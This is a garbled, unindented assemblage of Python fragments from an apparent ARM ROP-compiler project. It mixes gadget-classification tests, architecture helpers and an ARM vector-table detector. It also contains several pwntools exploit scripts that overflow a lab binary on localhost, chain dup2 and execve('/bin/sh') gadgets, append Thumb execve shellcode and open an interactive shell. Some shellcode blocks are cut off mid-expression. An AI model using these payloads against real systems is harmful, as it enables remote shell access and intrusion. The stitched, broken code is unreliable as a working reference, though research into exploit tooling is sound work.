def not_test_arm(self):
tests = [
({
LoadMem: 1
}, '\x08\x80\xbd\xe8'), # pop {r3, pc}
({
MoveReg: 1
}, '\x02\x00\xa0\xe1\x04\xf0\x9d\xe4'), # mov r0, r2; pop {pc}
({
LoadMem: 7,
LoadMultiple: 1
}, '\xf0\x87\xbd\xe8'), # pop {r4, r5, r6, r7, r8, r9, sl, pc}
(
{
LoadMem: 3,
LoadMultiple: 1
},
'\x04\xe0\x9d\xe5\x08\xd0\x8d\xe2' # ldr lr, [sp, #4]; add sp, sp, #8
+ '\x0c\x00\xbd\xe8\x1e\xff\x2f\xe1'), # pop {r2, r3}; bx lr
({
LoadMemJump: 6,
RegJumpNormal: 1
}, '\x1f\x40\xbd\xe8\x1c\xff\x2f\xe1'
), # pop {r0, r1, r2, r3, r4, lr}; bx r12
({
LoadMemJump: 1,
RegJumpNormal: 1
}, '\x04\xe0\x9d\xe4\x13\xff\x2f\xe1'), # pop {lr}; bx r3
]
#self.run_test(archinfo.ArchARM(), tests[2::1])
arch = archinfo.ArchARM()
self.run_test(arch, tests)
def __init__(self, endianess=Endianess.LITTLE):
super(ArchitectureArm,self).__init__(CS_ARCH_ARM, CS_MODE_ARM, 4, 4, endianess)
self._searcher = SearcherARM()
self._name = 'ARM'
if 'archinfo' in globals():
self._info = archinfo.ArchARM()
if 'keystone' in globals():
self._ksarch = (keystone.KS_ARCH_ARM, keystone.KS_MODE_ARM)
def __init__(self):
super(ArchitectureArmThumb, self).__init__(CS_ARCH_ARM, CS_MODE_THUMB, 4, 2)
self._searcher = SearcherARM()
self._name = 'ARMTHUMB'
self._maxInvalid = 2
if 'archinfo' in globals():
self._info = archinfo.ArchARM()
if 'keystone' in globals():
self._ksarch = (keystone.KS_ARCH_ARM, keystone.KS_MODE_THUMB)
def not_test_arm_jcc(self):
tests = [
({
RegJumpNormal: 2,
JCC: 1
}, '\x00\x00S\xe3\x00\x00\x00\n\x13\xff/\xe1\x1e\xff/\xe1'),
({
RegJumpNormal: 1
}, '\x13\xff\x2f\xe1'), # bx r3
#({RegJumpNormal:2, JCC:1}, '\x03\xb1\x18\x47\x70\x47'), #cbz r3, 10394 <register_tm_clones+0x28>; bx r3; bx lr
]
#self.run_test(archinfo.ArchARM(), tests[2::1])
arch = archinfo.ArchARM()
self.run_jcc_test(arch, tests)
def constructIR(binaryInst, address, arc="x86", endness="LE"):
ar = archinfo.ArchX86()
if arc == "x86":
ar = archinfo.ArchX86()
elif arc == "mips32":
if endness == "LE":
ar = archinfo.ArchMIPS32(archinfo.Endness.LE)
else:
ar = archinfo.ArchMIPS32(archinfo.Endness.BE)
elif arc == "arm":
ar = archinfo.ArchARM(archinfo.Endness.LE)
irsb = pyvex.IRSB(data=binaryInst, mem_addr=address, arch=ar)
stmts = irsb.statements
irsb.pp()
return stmts, irsb.jumpkind, irsb.next
def detect_arm_ivt(stream):
"""
:param stream:
:type stream: file
:return:
"""
min_arm_sp = 0x20000000
max_arm_sp = 0x20100000
# TODO: We're just looking at the front for now
try:
maybe_sp = stream.read(4)
maybe_le_sp = struct.unpack('<I', maybe_sp)[0]
maybe_be_sp = struct.unpack(">I", maybe_sp)[0]
if min_arm_sp < maybe_le_sp < max_arm_sp:
maybe_arch = archinfo.ArchARMEL(endness=archinfo.Endness.LE)
l.debug(
"Found possible Little-Endian ARM IVT with initial SP %#08x" %
maybe_le_sp)
maybe_entry = struct.unpack('<I', stream.read(4))[0]
l.debug("Reset vector at %#08x" % maybe_entry)
maybe_base = maybe_entry & 0xffff0000 # A complete guess
l.debug("Guessing base address at %#08x" % maybe_base)
return maybe_arch, maybe_base, maybe_entry
elif min_arm_sp < maybe_be_sp < max_arm_sp:
maybe_arch = archinfo.ArchARM(endness=archinfo.Endness.BE)
l.debug("Found possible Big-Endian ARM IVT with initial SP %#08x" %
maybe_be_sp)
maybe_entry = struct.unpack('>I', stream.read(4))[0]
l.debug("Reset vector at %#08x" % maybe_entry)
maybe_base = maybe_entry & 0xffff0000 # A complete guess
l.debug("Guessing base address at %#08x" % maybe_base)
return maybe_arch, maybe_base, maybe_entry
else:
# Nope
return (None, None, None)
except:
l.exception("Something died")
return (None, None, None)
finally:
stream.seek(0)
def test_arm(self):
arch = archinfo.ArchARM()
tests = [
(['\x08\x80\xbd\xe8'], LoadMem, ['sp'], ['r3'], [0], [], 0x8, 4,
True), # pop {r3, pc}
(['\x02\x00\xa0\xe1\x04\xf0\x9d\xe4'], MoveReg, ['r2'], ['r0'],
[0], [], 4, 0, True), # mov r0, r2; pop {pc}
(['\xf0\x87\xbd\xe8'], LoadMem, ['sp'], ['r4'], [0x00],
['r5', 'r6', 'r7', 'r8', 'r9', 'r10'
], 0x20, 0x1c, True), # pop {r4, r5, r6, r7, r8, r9, sl, pc}
(['\xf0\x87\xbd\xe8'], LoadMem, ['sp'], ['r5'], [0x04],
['r4', 'r6', 'r7', 'r8', 'r9', 'r10'
], 0x20, 0x1c, True), # pop {r4, r5, r6, r7, r8, r9, sl, pc}
(['\xf0\x87\xbd\xe8'], LoadMem, ['sp'], ['r6'], [0x08],
['r5', 'r4', 'r7', 'r8', 'r9', 'r10'
], 0x20, 0x1c, True), # pop {r4, r5, r6, r7, r8, r9, sl, pc}
(['\xf0\x87\xbd\xe8'], LoadMem, ['sp'], ['r7'], [0x0c],
['r5', 'r6', 'r4', 'r8', 'r9', 'r10'
], 0x20, 0x1c, True), # pop {r4, r5, r6, r7, r8, r9, sl, pc}
(['\xf0\x87\xbd\xe8'], LoadMem, ['sp'], ['r8'], [0x10],
['r5', 'r6', 'r7', 'r4', 'r9', 'r10'
], 0x20, 0x1c, True), # pop {r4, r5, r6, r7, r8, r9, sl, pc}
(['\xf0\x87\xbd\xe8'], LoadMem, ['sp'], ['r9'], [0x14],
['r5', 'r6', 'r7', 'r8', 'r4', 'r10'
], 0x20, 0x1c, True), # pop {r4, r5, r6, r7, r8, r9, sl, pc}
(['\xf0\x87\xbd\xe8'], LoadMem, ['sp'], ['r10'], [0x18],
['r5', 'r6', 'r7', 'r8', 'r9',
'r4'], 0x20, 0x1c, True), # pop {r4, r5, r6, r7, r8, r9, sl, pc}
(['\xf0\x87\xbd\xe8'], LoadMultiple, ['sp'],
['r4', 'r5', 'r6', 'r7', 'r8', 'r9',
'r10'], [0, 4, 8, 0xc, 0x10, 0x14, 0x18], [], 0x20, 0x1c,
True), # pop {r4, r5, r6, r7, r8, r9, sl, pc}
(
[
'\x04\xe0\x9d\xe5\x08\xd0\x8d\xe2\x0c\x00\xbd\xe8\x1e\xff\x2f\xe1'
], # ldr lr, [sp, #4]; add sp, sp, #8; pop {r2, r3}; bx lr
LoadMem,
['sp'],
['r2'],
[0x8],
['lr', 'r3'],
0x10,
4,
True),
(
[
'\x04\xe0\x9d\xe5\x08\xd0\x8d\xe2\x0c\x00\xbd\xe8\x1e\xff\x2f\xe1'
], # ldr lr, [sp, #4]; add sp, sp, #8; pop {r2, r3}; bx lr
LoadMem,
['sp'],
['r3'],
[0xc],
['lr', 'r2'],
0x10,
4,
True),
(['\x1f\x40\xbd\xe8\x1c\xff\x2f\xe1'], LoadMemJump, ['sp', 'r12'],
['r0'], [0], ['lr', 'r1', 'r2', 'r3', 'r4'], 0x18, None,
True), # pop {r0, r1, r2, r3, r4, lr}; bx r12
(['\x1f\x40\xbd\xe8\x1c\xff\x2f\xe1'], LoadMemJump, ['sp', 'r12'],
['r1'], [4], ['lr', 'r0', 'r2', 'r3', 'r4'], 0x18, None,
True), # pop {r0, r1, r2, r3, r4, lr}; bx r12
(['\x1f\x40\xbd\xe8\x1c\xff\x2f\xe1'], LoadMemJump, ['sp', 'r12'],
['r2'], [8], ['lr', 'r1', 'r0', 'r3', 'r4'], 0x18, None,
True), # pop {r0, r1, r2, r3, r4, lr}; bx r12
(['\x1f\x40\xbd\xe8\x1c\xff\x2f\xe1'], LoadMemJump, ['sp', 'r12'],
['r3'], [0xc], ['lr', 'r1', 'r2', 'r0', 'r4'], 0x18, None,
True), # pop {r0, r1, r2, r3, r4, lr}; bx r12
(['\x1f\x40\xbd\xe8\x1c\xff\x2f\xe1'], LoadMemJump, ['sp', 'r12'],
['r4'], [0x10], ['lr', 'r1', 'r2', 'r3', 'r0'], 0x18, None,
True), # pop {r0, r1, r2, r3, r4, lr}; bx r12
(['\x1f\x40\xbd\xe8\x1c\xff\x2f\xe1'], LoadMemJump, ['sp', 'r12'],
['lr'], [0x14], ['r0', 'r1', 'r2', 'r3', 'r4'], 0x18, None,
True), # pop {r0, r1, r2, r3, r4, lr}; bx r12
(['\x1f\x40\xbd\xe8\x1c\xff\x2f\xe1'], Jump, ['r12'], ['pc'], [0],
['lr', 'r0', 'r1', 'r2', 'r3',
'r4'], 0x18, None, True), # pop {r0, r1, r2, r3, r4, lr}; bx r12
(['\x04\xe0\x9d\xe4\x13\xff\x2f\xe1'], LoadMemJump, ['sp', 'r3'],
['lr'], [0], [], 0x4, None, True), # pop {lr}; bx r3
(['\x04\xe0\x9d\xe4\x13\xff\x2f\xe1'], Jump, ['r3'], ['pc'], [0],
[], 0x4, None, True), # pop {lr}; bx r3
# Negative tests
(['\x04\xe0\x9d\xe4\x13\xff\x2f\xe1'], Jump, ['r3'], ['pc'], [0],
[], 0x8, None, False), # pop {lr}; bx r3 (bad stack offset)
(['\x02\x00\xa0\xe1\x04\xf0\x9d\xe4'
], MoveReg, ['r2'], ['r0'], [0], [], 4, 4,
False), # mov r0, r2; pop {pc} (bad ip in stack offset)
(['\xf0\x87\xbd\xe8'], LoadMem, ['sp'], ['r4'], [0x04],
['r5', 'r6', 'r7', 'r8', 'r9', 'r10'], 0x20, 0x1c,
False), # pop {r4, r5, r6, r7, r8, r9, sl, pc} (bad param)
(['\xf0\x87\xbd\xe8'], LoadMultiple, ['sp'],
['r4', 'r5', 'r6', 'r7', 'r8', 'r9',
'r10'], [0, 4, 7, 0xc, 0x10, 0x14, 0x18], [], 0x20, 0x1c,
False), # pop {r4, r5, r6, r7, r8, r9, sl, pc} (bad param)
]
self.run_test(arch, tests)
import sys, logging
import archinfo
from pwn import *
from rop_compiler import ropme
filename = './arm_bof_execve'
p = remote('localhost', 2222)
print "Using automatically built ROP chain"
files = [(filename, None, 0)]
goals = [["function", "dup2", 4, 0], ["function", "dup2", 4, 1],
["function", "dup2", 4, 2], ["execve", "/bin/sh"]]
rop = ropme.rop(files, [], goals, archinfo.ArchARM(), log_level=logging.DEBUG)
payload = 'A' * 512 + 'B' * 4 + rop
payload += ((700 - len(payload)) * 'B')
payload += "JEFF" # To end our input
with open("/tmp/rop", "w") as f:
f.write(rop)
with open("/tmp/payload", "w") as f:
f.write(payload)
p.writeline(payload)
p.interactive()
+ "\x0c\x30" # adds r0, #12
+ "\x01\x90" # str r0, [sp, #4]
+ "\x01\xa9" # add r1, sp, #4
+ "\x92\x1a" # subs r2, r2, r2
+ "\x02\x92" # str r2, [sp, #8]
+ "\x0b\x27" # movs r7, #11
+ "\x01\xdf" # svc 1
+ "//bin/sh" # program to execute
+ "\x00" # NULL to end the string
)
target_address = buffer_address + 700
print "shellcode ({} bytes) address: 0x{:x}".format(len(shellcode),
target_address)
print "Using automatically built ROP chain"
rop = ropme.rop_to_shellcode([(filename, None, 0),
(libc, libc_gadget_file, libc_address)], [libc],
target_address, archinfo.ArchARM(), logging.DEBUG)
payload = 'A' * 512 + 'B' * 4 + rop
payload += ((700 - len(payload)) * 'B') + shellcode
payload += "JEFF" # To end our input
with open("/tmp/rop", "w") as f:
f.write(rop)
with open("/tmp/payload", "w") as f:
f.write(payload)
p.writeline(payload)
p.interactive()
+ "\x78\x46" # mov r0, pc
+ "\x0c\x30" # adds r0, #12
+ "\x01\x90" # str r0, [sp, #4]
+ "\x01\xa9" # add r1, sp, #4
+ "\x92\x1a" # subs r2, r2, r2
+ "\x02\x92" # str r2, [sp, #8]
+ "\x0b\x27" # movs r7, #11
+ "\x01\xdf" # svc 1
+ "//bin/sh" # program to execute
+ "\x00" # NULL to end the string
)
target_address = buffer_address + 700
print "shellcode ({} bytes) address: 0x{:x}".format(len(shellcode),
target_address)
print "Using automatically built ROP chain"
rop = ropme.rop_to_shellcode([(filename, None, 0)], [], target_address,
archinfo.ArchARM(), logging.DEBUG)
payload = 'A' * 512 + 'B' * 4 + rop
payload += ((700 - len(payload)) * 'B') + shellcode
payload += "JEFF" # To end our input
with open("/tmp/rop", "w") as f:
f.write(rop)
with open("/tmp/payload", "w") as f:
f.write(payload)
p.writeline(payload)
p.interactive()
def skip_test_arm(self):
arch = archinfo.ArchARM()
tests = [
]
self.run_test(arch, tests)
